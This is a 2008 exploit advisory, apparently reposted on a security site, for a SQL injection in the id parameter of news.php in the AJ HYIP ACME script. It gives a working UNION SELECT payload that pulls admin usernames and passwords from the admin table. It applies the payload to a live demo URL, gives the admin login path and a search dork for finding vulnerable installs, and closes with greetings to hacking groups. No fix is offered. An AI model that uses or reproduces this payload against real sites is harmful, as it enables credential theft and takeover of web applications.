AJ HYIP ACME (news.php id) Remote SQL Injection Vulnerability

2008-06-21 00:00:00

########################################################
#
# HYIP ACME Version SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# hussin.x[at]hotmail[DoT]com =
# =
#========================================================
# HomE script : http://www.ajsquare.com/
#
# Demo : http://www.ajhyip.com/demo/acme/index.php
#
#
# DorK : Copyright Acme 2008
#
#
##########################################################

Exploit:


http://www.site.com/[PaTs]/news.php?id=-1+union+select+null,null,concat_ws

(0x3a,username,admin_password),0x4861636B65645F42795F48757373696E5F58,null+from+admin

--



L!VE DEMO:

http://www.ajhyip.com/demo/acme/news.php?id=-1+union+select+null,null,concat_ws

(0x3a,username,admin_password),0x4861636B65645F42795F48757373696E5F58,null+from+admin

--


LogiN:

admin/index.php


################################################################################
####################################( Greetz )##################################
# #
# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke #

# Silic0n / Rafi / FAHD / Iraqihack #

# #
#################################(and All IRAQIs)###############################
################################################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.